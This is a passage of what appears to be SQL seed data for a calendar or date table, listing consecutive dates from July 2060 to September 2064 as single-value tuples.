('2060-07-29'),
('2060-07-30'),
('2060-07-31'),
('2060-08-01'),
('2060-08-02'),
('2060-08-03'),
('2060-08-04'),
('2060-08-05'),
('2060-08-06'),
('2060-08-07'),
('2060-08-08'),
('2060-08-09'),
('2060-08-10'),
('2060-08-11'),
('2060-08-12'),
('2060-08-13'),
('2060-08-14'),
('2060-08-15'),
('2060-08-16'),
('2060-08-17'),
('2060-08-18'),
('2060-08-19'),
('2060-08-20'),
('2060-08-21'),
('2060-08-22'),
('2060-08-23'),
('2060-08-24'),
('2060-08-25'),
('2060-08-26'),
('2060-08-27'),
('2060-08-28'),
('2060-08-29'),
('2060-08-30'),
('2060-08-31'),
('2060-09-01'),
('2060-09-02'),
('2060-09-03'),
('2060-09-04'),
('2060-09-05'),
('2060-09-06'),
('2060-09-07'),
('2060-09-08'),
('2060-09-09'),
('2060-09-10'),
('2060-09-11'),
('2060-09-12'),
('2060-09-13'),
('2060-09-14'),
('2060-09-15'),
('2060-09-16'),
('2060-09-17'),
('2060-09-18'),
('2060-09-19'),
('2060-09-20'),
('2060-09-21'),
('2060-09-22'),
('2060-09-23'),
('2060-09-24'),
('2060-09-25'),
('2060-09-26'),
('2060-09-27'),
('2060-09-28'),
('2060-09-29'),
('2060-09-30'),
('2060-10-01'),
('2060-10-02'),
('2060-10-03'),
('2060-10-04'),
('2060-10-05'),
('2060-10-06'),
('2060-10-07'),
('2060-10-08'),
('2060-10-09'),
('2060-10-10'),
('2060-10-11'),
('2060-10-12'),
('2060-10-13'),
('2060-10-14'),
('2060-10-15'),
('2060-10-16'),
('2060-10-17'),
('2060-10-18'),
('2060-10-19'),
('2060-10-20'),
('2060-10-21'),
('2060-10-22'),
('2060-10-23'),
('2060-10-24'),
('2060-10-25'),
('2060-10-26'),
('2060-10-27'),
('2060-10-28'),
('2060-10-29'),
('2060-10-30'),
('2060-10-31'),
('2060-11-01'),
('2060-11-02'),
('2060-11-03'),
('2060-11-04'),
('2060-11-05'),
('2060-11-06'),
('2060-11-07'),
('2060-11-08'),
('2060-11-09'),
('2060-11-10'),
('2060-11-11'),
('2060-11-12'),
('2060-11-13'),
('2060-11-14'),
('2060-11-15'),
('2060-11-16'),
('2060-11-17'),
('2060-11-18'),
('2060-11-19'),
('2060-11-20'),
('2060-11-21'),
('2060-11-22'),
('2060-11-23'),
('2060-11-24'),
('2060-11-25'),
('2060-11-26'),
('2060-11-27'),
('2060-11-28'),
('2060-11-29'),
('2060-11-30'),
('2060-12-01'),
('2060-12-02'),
('2060-12-03'),
('2060-12-04'),
('2060-12-05'),
('2060-12-06'),
('2060-12-07'),
('2060-12-08'),
('2060-12-09'),
('2060-12-10'),
('2060-12-11'),
('2060-12-12'),
('2060-12-13'),
('2060-12-14'),
('2060-12-15'),
('2060-12-16'),
('2060-12-17'),
('2060-12-18'),
('2060-12-19'),
('2060-12-20'),
('2060-12-21'),
('2060-12-22'),
('2060-12-23'),
('2060-12-24'),
('2060-12-25'),
('2060-12-26'),
('2060-12-27'),
('2060-12-28'),
('2060-12-29'),
('2060-12-30'),
('2060-12-31'),
('2061-01-01'),
('2061-01-02'),
('2061-01-03'),
('2061-01-04'),
('2061-01-05'),
('2061-01-06'),
('2061-01-07'),
('2061-01-08'),
('2061-01-09'),
('2061-01-10'),
('2061-01-11'),
('2061-01-12'),
('2061-01-13'),
('2061-01-14'),
('2061-01-15'),
('2061-01-16'),
('2061-01-17'),
('2061-01-18'),
('2061-01-19'),
('2061-01-20'),
('2061-01-21'),
('2061-01-22'),
('2061-01-23'),
('2061-01-24'),
('2061-01-25'),
('2061-01-26'),
('2061-01-27'),
('2061-01-28'),
('2061-01-29'),
('2061-01-30'),
('2061-01-31'),
('2061-02-01'),
('2061-02-02'),
('2061-02-03'),
('2061-02-04'),
('2061-02-05'),
('2061-02-06'),
('2061-02-07'),
('2061-02-08'),
('2061-02-09'),
('2061-02-10'),
('2061-02-11'),
('2061-02-12'),
('2061-02-13'),
('2061-02-14'),
('2061-02-15'),
('2061-02-16'),
('2061-02-17'),
('2061-02-18'),
('2061-02-19'),
('2061-02-20'),
('2061-02-21'),
('2061-02-22'),
('2061-02-23'),
('2061-02-24'),
('2061-02-25'),
('2061-02-26'),
('2061-02-27'),
('2061-02-28'),
('2061-03-01'),
('2061-03-02'),
('2061-03-03'),
('2061-03-04'),
('2061-03-05'),
('2061-03-06'),
('2061-03-07'),
('2061-03-08'),
('2061-03-09'),
('2061-03-10'),
('2061-03-11'),
('2061-03-12'),
('2061-03-13'),
('2061-03-14'),
('2061-03-15'),
('2061-03-16'),
('2061-03-17'),
('2061-03-18'),
('2061-03-19'),
('2061-03-20'),
('2061-03-21'),
('2061-03-22'),
('2061-03-23'),
('2061-03-24'),
('2061-03-25'),
('2061-03-26'),
('2061-03-27'),
('2061-03-28'),
('2061-03-29'),
('2061-03-30'),
('2061-03-31'),
('2061-04-01'),
('2061-04-02'),
('2061-04-03'),
('2061-04-04'),
('2061-04-05'),
('2061-04-06'),
('2061-04-07'),
('2061-04-08'),
('2061-04-09'),
('2061-04-10'),
('2061-04-11'),
('2061-04-12'),
('2061-04-13'),
('2061-04-14'),
('2061-04-15'),
('2061-04-16'),
('2061-04-17'),
('2061-04-18'),
('2061-04-19'),
('2061-04-20'),
('2061-04-21'),
('2061-04-22'),
('2061-04-23'),
('2061-04-24'),
('2061-04-25'),
('2061-04-26'),
('2061-04-27'),
('2061-04-28'),
('2061-04-29'),
('2061-04-30'),
('2061-05-01'),
('2061-05-02'),
('2061-05-03'),
('2061-05-04'),
('2061-05-05'),
('2061-05-06'),
('2061-05-07'),
('2061-05-08'),
('2061-05-09'),
('2061-05-10'),
('2061-05-11'),
('2061-05-12'),
('2061-05-13'),
('2061-05-14'),
('2061-05-15'),
('2061-05-16'),
('2061-05-17'),
('2061-05-18'),
('2061-05-19'),
('2061-05-20'),
('2061-05-21'),
('2061-05-22'),
('2061-05-23'),
('2061-05-24'),
('2061-05-25'),
('2061-05-26'),
('2061-05-27'),
('2061-05-28'),
('2061-05-29'),
('2061-05-30'),
('2061-05-31'),
('2061-06-01'),
('2061-06-02'),
('2061-06-03'),
('2061-06-04'),
('2061-06-05'),
('2061-06-06'),
('2061-06-07'),
('2061-06-08'),
('2061-06-09'),
('2061-06-10'),
('2061-06-11'),
('2061-06-12'),
('2061-06-13'),
('2061-06-14'),
('2061-06-15'),
('2061-06-16'),
('2061-06-17'),
('2061-06-18'),
('2061-06-19'),
('2061-06-20'),
('2061-06-21'),
('2061-06-22'),
('2061-06-23'),
('2061-06-24'),
('2061-06-25'),
('2061-06-26'),
('2061-06-27'),
('2061-06-28'),
('2061-06-29'),
('2061-06-30'),
('2061-07-01'),
('2061-07-02'),
('2061-07-03'),
('2061-07-04'),
('2061-07-05'),
('2061-07-06'),
('2061-07-07'),
('2061-07-08'),
('2061-07-09'),
('2061-07-10'),
('2061-07-11'),
('2061-07-12'),
('2061-07-13'),
('2061-07-14'),
('2061-07-15'),
('2061-07-16'),
('2061-07-17'),
('2061-07-18'),
('2061-07-19'),
('2061-07-20'),
('2061-07-21'),
('2061-07-22'),
('2061-07-23'),
('2061-07-24'),
('2061-07-25'),
('2061-07-26'),
('2061-07-27'),
('2061-07-28'),
('2061-07-29'),
('2061-07-30'),
('2061-07-31'),
('2061-08-01'),
('2061-08-02'),
('2061-08-03'),
('2061-08-04'),
('2061-08-05'),
('2061-08-06'),
('2061-08-07'),
('2061-08-08'),
('2061-08-09'),
('2061-08-10'),
('2061-08-11'),
('2061-08-12'),
('2061-08-13'),
('2061-08-14'),
('2061-08-15'),
('2061-08-16'),
('2061-08-17'),
('2061-08-18'),
('2061-08-19'),
('2061-08-20'),
('2061-08-21'),
('2061-08-22'),
('2061-08-23'),
('2061-08-24'),
('2061-08-25'),
('2061-08-26'),
('2061-08-27'),
('2061-08-28'),
('2061-08-29'),
('2061-08-30'),
('2061-08-31'),
('2061-09-01'),
('2061-09-02'),
('2061-09-03'),
('2061-09-04'),
('2061-09-05'),
('2061-09-06'),
('2061-09-07'),
('2061-09-08'),
('2061-09-09'),
('2061-09-10'),
('2061-09-11'),
('2061-09-12'),
('2061-09-13'),
('2061-09-14'),
('2061-09-15'),
('2061-09-16'),
('2061-09-17'),
('2061-09-18'),
('2061-09-19'),
('2061-09-20'),
('2061-09-21'),
('2061-09-22'),
('2061-09-23'),
('2061-09-24'),
('2061-09-25'),
('2061-09-26'),
('2061-09-27'),
('2061-09-28'),
('2061-09-29'),
('2061-09-30'),
('2061-10-01'),
('2061-10-02'),
('2061-10-03'),
('2061-10-04'),
('2061-10-05'),
('2061-10-06'),
('2061-10-07'),
('2061-10-08'),
('2061-10-09'),
('2061-10-10'),
('2061-10-11'),
('2061-10-12'),
('2061-10-13'),
('2061-10-14'),
('2061-10-15'),
('2061-10-16'),
('2061-10-17'),
('2061-10-18'),
('2061-10-19'),
('2061-10-20'),
('2061-10-21'),
('2061-10-22'),
('2061-10-23'),
('2061-10-24'),
('2061-10-25'),
('2061-10-26'),
('2061-10-27'),
('2061-10-28'),
('2061-10-29'),
('2061-10-30'),
('2061-10-31'),
('2061-11-01'),
('2061-11-02'),
('2061-11-03'),
('2061-11-04'),
('2061-11-05'),
('2061-11-06'),
('2061-11-07'),
('2061-11-08'),
('2061-11-09'),
('2061-11-10'),
('2061-11-11'),
('2061-11-12'),
('2061-11-13'),
('2061-11-14'),
('2061-11-15'),
('2061-11-16'),
('2061-11-17'),
('2061-11-18'),
('2061-11-19'),
('2061-11-20'),
('2061-11-21'),
('2061-11-22'),
('2061-11-23'),
('2061-11-24'),
('2061-11-25'),
('2061-11-26'),
('2061-11-27'),
('2061-11-28'),
('2061-11-29'),
('2061-11-30'),
('2061-12-01'),
('2061-12-02'),
('2061-12-03'),
('2061-12-04'),
('2061-12-05'),
('2061-12-06'),
('2061-12-07'),
('2061-12-08'),
('2061-12-09'),
('2061-12-10'),
('2061-12-11'),
('2061-12-12'),
('2061-12-13'),
('2061-12-14'),
('2061-12-15'),
('2061-12-16'),
('2061-12-17'),
('2061-12-18'),
('2061-12-19'),
('2061-12-20'),
('2061-12-21'),
('2061-12-22'),
('2061-12-23'),
('2061-12-24'),
('2061-12-25'),
('2061-12-26'),
('2061-12-27'),
('2061-12-28'),
('2061-12-29'),
('2061-12-30'),
('2061-12-31'),
('2062-01-01'),
('2062-01-02'),
('2062-01-03'),
('2062-01-04'),
('2062-01-05'),
('2062-01-06'),
('2062-01-07'),
('2062-01-08'),
('2062-01-09'),
('2062-01-10'),
('2062-01-11'),
('2062-01-12'),
('2062-01-13'),
('2062-01-14'),
('2062-01-15'),
('2062-01-16'),
('2062-01-17'),
('2062-01-18'),
('2062-01-19'),
('2062-01-20'),
('2062-01-21'),
('2062-01-22'),
('2062-01-23'),
('2062-01-24'),
('2062-01-25'),
('2062-01-26'),
('2062-01-27'),
('2062-01-28'),
('2062-01-29'),
('2062-01-30'),
('2062-01-31'),
('2062-02-01'),
('2062-02-02'),
('2062-02-03'),
('2062-02-04'),
('2062-02-05'),
('2062-02-06'),
('2062-02-07'),
('2062-02-08'),
('2062-02-09'),
('2062-02-10'),
('2062-02-11'),
('2062-02-12'),
('2062-02-13'),
('2062-02-14'),
('2062-02-15'),
('2062-02-16'),
('2062-02-17'),
('2062-02-18'),
('2062-02-19'),
('2062-02-20'),
('2062-02-21'),
('2062-02-22'),
('2062-02-23'),
('2062-02-24'),
('2062-02-25'),
('2062-02-26'),
('2062-02-27'),
('2062-02-28'),
('2062-03-01'),
('2062-03-02'),
('2062-03-03'),
('2062-03-04'),
('2062-03-05'),
('2062-03-06'),
('2062-03-07'),
('2062-03-08'),
('2062-03-09'),
('2062-03-10'),
('2062-03-11'),
('2062-03-12'),
('2062-03-13'),
('2062-03-14'),
('2062-03-15'),
('2062-03-16'),
('2062-03-17'),
('2062-03-18'),
('2062-03-19'),
('2062-03-20'),
('2062-03-21'),
('2062-03-22'),
('2062-03-23'),
('2062-03-24'),
('2062-03-25'),
('2062-03-26'),
('2062-03-27'),
('2062-03-28'),
('2062-03-29'),
('2062-03-30'),
('2062-03-31'),
('2062-04-01'),
('2062-04-02'),
('2062-04-03'),
('2062-04-04'),
('2062-04-05'),
('2062-04-06'),
('2062-04-07'),
('2062-04-08'),
('2062-04-09'),
('2062-04-10'),
('2062-04-11'),
('2062-04-12'),
('2062-04-13'),
('2062-04-14'),
('2062-04-15'),
('2062-04-16'),
('2062-04-17'),
('2062-04-18'),
('2062-04-19'),
('2062-04-20'),
('2062-04-21'),
('2062-04-22'),
('2062-04-23'),
('2062-04-24'),
('2062-04-25'),
('2062-04-26'),
('2062-04-27'),
('2062-04-28'),
('2062-04-29'),
('2062-04-30'),
('2062-05-01'),
('2062-05-02'),
('2062-05-03'),
('2062-05-04'),
('2062-05-05'),
('2062-05-06'),
('2062-05-07'),
('2062-05-08'),
('2062-05-09'),
('2062-05-10'),
('2062-05-11'),
('2062-05-12'),
('2062-05-13'),
('2062-05-14'),
('2062-05-15'),
('2062-05-16'),
('2062-05-17'),
('2062-05-18'),
('2062-05-19'),
('2062-05-20'),
('2062-05-21'),
('2062-05-22'),
('2062-05-23'),
('2062-05-24'),
('2062-05-25'),
('2062-05-26'),
('2062-05-27'),
('2062-05-28'),
('2062-05-29'),
('2062-05-30'),
('2062-05-31'),
('2062-06-01'),
('2062-06-02'),
('2062-06-03'),
('2062-06-04'),
('2062-06-05'),
('2062-06-06'),
('2062-06-07'),
('2062-06-08'),
('2062-06-09'),
('2062-06-10'),
('2062-06-11'),
('2062-06-12'),
('2062-06-13'),
('2062-06-14'),
('2062-06-15'),
('2062-06-16'),
('2062-06-17'),
('2062-06-18'),
('2062-06-19'),
('2062-06-20'),
('2062-06-21'),
('2062-06-22'),
('2062-06-23'),
('2062-06-24'),
('2062-06-25'),
('2062-06-26'),
('2062-06-27'),
('2062-06-28'),
('2062-06-29'),
('2062-06-30'),
('2062-07-01'),
('2062-07-02'),
('2062-07-03'),
('2062-07-04'),
('2062-07-05'),
('2062-07-06'),
('2062-07-07'),
('2062-07-08'),
('2062-07-09'),
('2062-07-10'),
('2062-07-11'),
('2062-07-12'),
('2062-07-13'),
('2062-07-14'),
('2062-07-15'),
('2062-07-16'),
('2062-07-17'),
('2062-07-18'),
('2062-07-19'),
('2062-07-20'),
('2062-07-21'),
('2062-07-22'),
('2062-07-23'),
('2062-07-24'),
('2062-07-25'),
('2062-07-26'),
('2062-07-27'),
('2062-07-28'),
('2062-07-29'),
('2062-07-30'),
('2062-07-31'),
('2062-08-01'),
('2062-08-02'),
('2062-08-03'),
('2062-08-04'),
('2062-08-05'),
('2062-08-06'),
('2062-08-07'),
('2062-08-08'),
('2062-08-09'),
('2062-08-10'),
('2062-08-11'),
('2062-08-12'),
('2062-08-13'),
('2062-08-14'),
('2062-08-15'),
('2062-08-16'),
('2062-08-17'),
('2062-08-18'),
('2062-08-19'),
('2062-08-20'),
('2062-08-21'),
('2062-08-22'),
('2062-08-23'),
('2062-08-24'),
('2062-08-25'),
('2062-08-26'),
('2062-08-27'),
('2062-08-28'),
('2062-08-29'),
('2062-08-30'),
('2062-08-31'),
('2062-09-01'),
('2062-09-02'),
('2062-09-03'),
('2062-09-04'),
('2062-09-05'),
('2062-09-06'),
('2062-09-07'),
('2062-09-08'),
('2062-09-09'),
('2062-09-10'),
('2062-09-11'),
('2062-09-12'),
('2062-09-13'),
('2062-09-14'),
('2062-09-15'),
('2062-09-16'),
('2062-09-17'),
('2062-09-18'),
('2062-09-19'),
('2062-09-20'),
('2062-09-21'),
('2062-09-22'),
('2062-09-23'),
('2062-09-24'),
('2062-09-25'),
('2062-09-26'),
('2062-09-27'),
('2062-09-28'),
('2062-09-29'),
('2062-09-30'),
('2062-10-01'),
('2062-10-02'),
('2062-10-03'),
('2062-10-04'),
('2062-10-05'),
('2062-10-06'),
('2062-10-07'),
('2062-10-08'),
('2062-10-09'),
('2062-10-10'),
('2062-10-11'),
('2062-10-12'),
('2062-10-13'),
('2062-10-14'),
('2062-10-15'),
('2062-10-16'),
('2062-10-17'),
('2062-10-18'),
('2062-10-19'),
('2062-10-20'),
('2062-10-21'),
('2062-10-22'),
('2062-10-23'),
('2062-10-24'),
('2062-10-25'),
('2062-10-26'),
('2062-10-27'),
('2062-10-28'),
('2062-10-29'),
('2062-10-30'),
('2062-10-31'),
('2062-11-01'),
('2062-11-02'),
('2062-11-03'),
('2062-11-04'),
('2062-11-05'),
('2062-11-06'),
('2062-11-07'),
('2062-11-08'),
('2062-11-09'),
('2062-11-10'),
('2062-11-11'),
('2062-11-12'),
('2062-11-13'),
('2062-11-14'),
('2062-11-15'),
('2062-11-16'),
('2062-11-17'),
('2062-11-18'),
('2062-11-19'),
('2062-11-20'),
('2062-11-21'),
('2062-11-22'),
('2062-11-23'),
('2062-11-24'),
('2062-11-25'),
('2062-11-26'),
('2062-11-27'),
('2062-11-28'),
('2062-11-29'),
('2062-11-30'),
('2062-12-01'),
('2062-12-02'),
('2062-12-03'),
('2062-12-04'),
('2062-12-05'),
('2062-12-06'),
('2062-12-07'),
('2062-12-08'),
('2062-12-09'),
('2062-12-10'),
('2062-12-11'),
('2062-12-12'),
('2062-12-13'),
('2062-12-14'),
('2062-12-15'),
('2062-12-16'),
('2062-12-17'),
('2062-12-18'),
('2062-12-19'),
('2062-12-20'),
('2062-12-21'),
('2062-12-22'),
('2062-12-23'),
('2062-12-24'),
('2062-12-25'),
('2062-12-26'),
('2062-12-27'),
('2062-12-28'),
('2062-12-29'),
('2062-12-30'),
('2062-12-31'),
('2063-01-01'),
('2063-01-02'),
('2063-01-03'),
('2063-01-04'),
('2063-01-05'),
('2063-01-06'),
('2063-01-07'),
('2063-01-08'),
('2063-01-09'),
('2063-01-10'),
('2063-01-11'),
('2063-01-12'),
('2063-01-13'),
('2063-01-14'),
('2063-01-15'),
('2063-01-16'),
('2063-01-17'),
('2063-01-18'),
('2063-01-19'),
('2063-01-20'),
('2063-01-21'),
('2063-01-22'),
('2063-01-23'),
('2063-01-24'),
('2063-01-25'),
('2063-01-26'),
('2063-01-27'),
('2063-01-28'),
('2063-01-29'),
('2063-01-30'),
('2063-01-31'),
('2063-02-01'),
('2063-02-02'),
('2063-02-03'),
('2063-02-04'),
('2063-02-05'),
('2063-02-06'),
('2063-02-07'),
('2063-02-08'),
('2063-02-09'),
('2063-02-10'),
('2063-02-11'),
('2063-02-12'),
('2063-02-13'),
('2063-02-14'),
('2063-02-15'),
('2063-02-16'),
('2063-02-17'),
('2063-02-18'),
('2063-02-19'),
('2063-02-20'),
('2063-02-21'),
('2063-02-22'),
('2063-02-23'),
('2063-02-24'),
('2063-02-25'),
('2063-02-26'),
('2063-02-27'),
('2063-02-28'),
('2063-03-01'),
('2063-03-02'),
('2063-03-03'),
('2063-03-04'),
('2063-03-05'),
('2063-03-06'),
('2063-03-07'),
('2063-03-08'),
('2063-03-09'),
('2063-03-10'),
('2063-03-11'),
('2063-03-12'),
('2063-03-13'),
('2063-03-14'),
('2063-03-15'),
('2063-03-16'),
('2063-03-17'),
('2063-03-18'),
('2063-03-19'),
('2063-03-20'),
('2063-03-21'),
('2063-03-22'),
('2063-03-23'),
('2063-03-24'),
('2063-03-25'),
('2063-03-26'),
('2063-03-27'),
('2063-03-28'),
('2063-03-29'),
('2063-03-30'),
('2063-03-31'),
('2063-04-01'),
('2063-04-02'),
('2063-04-03'),
('2063-04-04'),
('2063-04-05'),
('2063-04-06'),
('2063-04-07'),
('2063-04-08'),
('2063-04-09'),
('2063-04-10'),
('2063-04-11'),
('2063-04-12'),
('2063-04-13'),
('2063-04-14'),
('2063-04-15'),
('2063-04-16'),
('2063-04-17'),
('2063-04-18'),
('2063-04-19'),
('2063-04-20'),
('2063-04-21'),
('2063-04-22'),
('2063-04-23'),
('2063-04-24'),
('2063-04-25'),
('2063-04-26'),
('2063-04-27'),
('2063-04-28'),
('2063-04-29'),
('2063-04-30'),
('2063-05-01'),
('2063-05-02'),
('2063-05-03'),
('2063-05-04'),
('2063-05-05'),
('2063-05-06'),
('2063-05-07'),
('2063-05-08'),
('2063-05-09'),
('2063-05-10'),
('2063-05-11'),
('2063-05-12'),
('2063-05-13'),
('2063-05-14'),
('2063-05-15'),
('2063-05-16'),
('2063-05-17'),
('2063-05-18'),
('2063-05-19'),
('2063-05-20'),
('2063-05-21'),
('2063-05-22'),
('2063-05-23'),
('2063-05-24'),
('2063-05-25'),
('2063-05-26'),
('2063-05-27'),
('2063-05-28'),
('2063-05-29'),
('2063-05-30'),
('2063-05-31'),
('2063-06-01'),
('2063-06-02'),
('2063-06-03'),
('2063-06-04'),
('2063-06-05'),
('2063-06-06'),
('2063-06-07'),
('2063-06-08'),
('2063-06-09'),
('2063-06-10'),
('2063-06-11'),
('2063-06-12'),
('2063-06-13'),
('2063-06-14'),
('2063-06-15'),
('2063-06-16'),
('2063-06-17'),
('2063-06-18'),
('2063-06-19'),
('2063-06-20'),
('2063-06-21'),
('2063-06-22'),
('2063-06-23'),
('2063-06-24'),
('2063-06-25'),
('2063-06-26'),
('2063-06-27'),
('2063-06-28'),
('2063-06-29'),
('2063-06-30'),
('2063-07-01'),
('2063-07-02'),
('2063-07-03'),
('2063-07-04'),
('2063-07-05'),
('2063-07-06'),
('2063-07-07'),
('2063-07-08'),
('2063-07-09'),
('2063-07-10'),
('2063-07-11'),
('2063-07-12'),
('2063-07-13'),
('2063-07-14'),
('2063-07-15'),
('2063-07-16'),
('2063-07-17'),
('2063-07-18'),
('2063-07-19'),
('2063-07-20'),
('2063-07-21'),
('2063-07-22'),
('2063-07-23'),
('2063-07-24'),
('2063-07-25'),
('2063-07-26'),
('2063-07-27'),
('2063-07-28'),
('2063-07-29'),
('2063-07-30'),
('2063-07-31'),
('2063-08-01'),
('2063-08-02'),
('2063-08-03'),
('2063-08-04'),
('2063-08-05'),
('2063-08-06'),
('2063-08-07'),
('2063-08-08'),
('2063-08-09'),
('2063-08-10'),
('2063-08-11'),
('2063-08-12'),
('2063-08-13'),
('2063-08-14'),
('2063-08-15'),
('2063-08-16'),
('2063-08-17'),
('2063-08-18'),
('2063-08-19'),
('2063-08-20'),
('2063-08-21'),
('2063-08-22'),
('2063-08-23'),
('2063-08-24'),
('2063-08-25'),
('2063-08-26'),
('2063-08-27'),
('2063-08-28'),
('2063-08-29'),
('2063-08-30'),
('2063-08-31'),
('2063-09-01'),
('2063-09-02'),
('2063-09-03'),
('2063-09-04'),
('2063-09-05'),
('2063-09-06'),
('2063-09-07'),
('2063-09-08'),
('2063-09-09'),
('2063-09-10'),
('2063-09-11'),
('2063-09-12'),
('2063-09-13'),
('2063-09-14'),
('2063-09-15'),
('2063-09-16'),
('2063-09-17'),
('2063-09-18'),
('2063-09-19'),
('2063-09-20'),
('2063-09-21'),
('2063-09-22'),
('2063-09-23'),
('2063-09-24'),
('2063-09-25'),
('2063-09-26'),
('2063-09-27'),
('2063-09-28'),
('2063-09-29'),
('2063-09-30'),
('2063-10-01'),
('2063-10-02'),
('2063-10-03'),
('2063-10-04'),
('2063-10-05'),
('2063-10-06'),
('2063-10-07'),
('2063-10-08'),
('2063-10-09'),
('2063-10-10'),
('2063-10-11'),
('2063-10-12'),
('2063-10-13'),
('2063-10-14'),
('2063-10-15'),
('2063-10-16'),
('2063-10-17'),
('2063-10-18'),
('2063-10-19'),
('2063-10-20'),
('2063-10-21'),
('2063-10-22'),
('2063-10-23'),
('2063-10-24'),
('2063-10-25'),
('2063-10-26'),
('2063-10-27'),
('2063-10-28'),
('2063-10-29'),
('2063-10-30'),
('2063-10-31'),
('2063-11-01'),
('2063-11-02'),
('2063-11-03'),
('2063-11-04'),
('2063-11-05'),
('2063-11-06'),
('2063-11-07'),
('2063-11-08'),
('2063-11-09'),
('2063-11-10'),
('2063-11-11'),
('2063-11-12'),
('2063-11-13'),
('2063-11-14'),
('2063-11-15'),
('2063-11-16'),
('2063-11-17'),
('2063-11-18'),
('2063-11-19'),
('2063-11-20'),
('2063-11-21'),
('2063-11-22'),
('2063-11-23'),
('2063-11-24'),
('2063-11-25'),
('2063-11-26'),
('2063-11-27'),
('2063-11-28'),
('2063-11-29'),
('2063-11-30'),
('2063-12-01'),
('2063-12-02'),
('2063-12-03'),
('2063-12-04'),
('2063-12-05'),
('2063-12-06'),
('2063-12-07'),
('2063-12-08'),
('2063-12-09'),
('2063-12-10'),
('2063-12-11'),
('2063-12-12'),
('2063-12-13'),
('2063-12-14'),
('2063-12-15'),
('2063-12-16'),
('2063-12-17'),
('2063-12-18'),
('2063-12-19'),
('2063-12-20'),
('2063-12-21'),
('2063-12-22'),
('2063-12-23'),
('2063-12-24'),
('2063-12-25'),
('2063-12-26'),
('2063-12-27'),
('2063-12-28'),
('2063-12-29'),
('2063-12-30'),
('2063-12-31'),
('2064-01-01'),
('2064-01-02'),
('2064-01-03'),
('2064-01-04'),
('2064-01-05'),
('2064-01-06'),
('2064-01-07'),
('2064-01-08'),
('2064-01-09'),
('2064-01-10'),
('2064-01-11'),
('2064-01-12'),
('2064-01-13'),
('2064-01-14'),
('2064-01-15'),
('2064-01-16'),
('2064-01-17'),
('2064-01-18'),
('2064-01-19'),
('2064-01-20'),
('2064-01-21'),
('2064-01-22'),
('2064-01-23'),
('2064-01-24'),
('2064-01-25'),
('2064-01-26'),
('2064-01-27'),
('2064-01-28'),
('2064-01-29'),
('2064-01-30'),
('2064-01-31'),
('2064-02-01'),
('2064-02-02'),
('2064-02-03'),
('2064-02-04'),
('2064-02-05'),
('2064-02-06'),
('2064-02-07'),
('2064-02-08'),
('2064-02-09'),
('2064-02-10'),
('2064-02-11'),
('2064-02-12'),
('2064-02-13'),
('2064-02-14'),
('2064-02-15'),
('2064-02-16'),
('2064-02-17'),
('2064-02-18'),
('2064-02-19'),
('2064-02-20'),
('2064-02-21'),
('2064-02-22'),
('2064-02-23'),
('2064-02-24'),
('2064-02-25'),
('2064-02-26'),
('2064-02-27'),
('2064-02-28'),
('2064-02-29'),
('2064-03-01'),
('2064-03-02'),
('2064-03-03'),
('2064-03-04'),
('2064-03-05'),
('2064-03-06'),
('2064-03-07'),
('2064-03-08'),
('2064-03-09'),
('2064-03-10'),
('2064-03-11'),
('2064-03-12'),
('2064-03-13'),
('2064-03-14'),
('2064-03-15'),
('2064-03-16'),
('2064-03-17'),
('2064-03-18'),
('2064-03-19'),
('2064-03-20'),
('2064-03-21'),
('2064-03-22'),
('2064-03-23'),
('2064-03-24'),
('2064-03-25'),
('2064-03-26'),
('2064-03-27'),
('2064-03-28'),
('2064-03-29'),
('2064-03-30'),
('2064-03-31'),
('2064-04-01'),
('2064-04-02'),
('2064-04-03'),
('2064-04-04'),
('2064-04-05'),
('2064-04-06'),
('2064-04-07'),
('2064-04-08'),
('2064-04-09'),
('2064-04-10'),
('2064-04-11'),
('2064-04-12'),
('2064-04-13'),
('2064-04-14'),
('2064-04-15'),
('2064-04-16'),
('2064-04-17'),
('2064-04-18'),
('2064-04-19'),
('2064-04-20'),
('2064-04-21'),
('2064-04-22'),
('2064-04-23'),
('2064-04-24'),
('2064-04-25'),
('2064-04-26'),
('2064-04-27'),
('2064-04-28'),
('2064-04-29'),
('2064-04-30'),
('2064-05-01'),
('2064-05-02'),
('2064-05-03'),
('2064-05-04'),
('2064-05-05'),
('2064-05-06'),
('2064-05-07'),
('2064-05-08'),
('2064-05-09'),
('2064-05-10'),
('2064-05-11'),
('2064-05-12'),
('2064-05-13'),
('2064-05-14'),
('2064-05-15'),
('2064-05-16'),
('2064-05-17'),
('2064-05-18'),
('2064-05-19'),
('2064-05-20'),
('2064-05-21'),
('2064-05-22'),
('2064-05-23'),
('2064-05-24'),
('2064-05-25'),
('2064-05-26'),
('2064-05-27'),
('2064-05-28'),
('2064-05-29'),
('2064-05-30'),
('2064-05-31'),
('2064-06-01'),
('2064-06-02'),
('2064-06-03'),
('2064-06-04'),
('2064-06-05'),
('2064-06-06'),
('2064-06-07'),
('2064-06-08'),
('2064-06-09'),
('2064-06-10'),
('2064-06-11'),
('2064-06-12'),
('2064-06-13'),
('2064-06-14'),
('2064-06-15'),
('2064-06-16'),
('2064-06-17'),
('2064-06-18'),
('2064-06-19'),
('2064-06-20'),
('2064-06-21'),
('2064-06-22'),
('2064-06-23'),
('2064-06-24'),
('2064-06-25'),
('2064-06-26'),
('2064-06-27'),
('2064-06-28'),
('2064-06-29'),
('2064-06-30'),
('2064-07-01'),
('2064-07-02'),
('2064-07-03'),
('2064-07-04'),
('2064-07-05'),
('2064-07-06'),
('2064-07-07'),
('2064-07-08'),
('2064-07-09'),
('2064-07-10'),
('2064-07-11'),
('2064-07-12'),
('2064-07-13'),
('2064-07-14'),
('2064-07-15'),
('2064-07-16'),
('2064-07-17'),
('2064-07-18'),
('2064-07-19'),
('2064-07-20'),
('2064-07-21'),
('2064-07-22'),
('2064-07-23'),
('2064-07-24'),
('2064-07-25'),
('2064-07-26'),
('2064-07-27'),
('2064-07-28'),
('2064-07-29'),
('2064-07-30'),
('2064-07-31'),
('2064-08-01'),
('2064-08-02'),
('2064-08-03'),
('2064-08-04'),
('2064-08-05'),
('2064-08-06'),
('2064-08-07'),
('2064-08-08'),
('2064-08-09'),
('2064-08-10'),
('2064-08-11'),
('2064-08-12'),
('2064-08-13'),
('2064-08-14'),
('2064-08-15'),
('2064-08-16'),
('2064-08-17'),
('2064-08-18'),
('2064-08-19'),
('2064-08-20'),
('2064-08-21'),
('2064-08-22'),
('2064-08-23'),
('2064-08-24'),
('2064-08-25'),
('2064-08-26'),
('2064-08-27'),
('2064-08-28'),
('2064-08-29'),
('2064-08-30'),
('2064-08-31'),
('2064-09-01'),
('2064-09-02'),
('2064-09-03'),
('2064-09-04'),
('2064-09-05'),
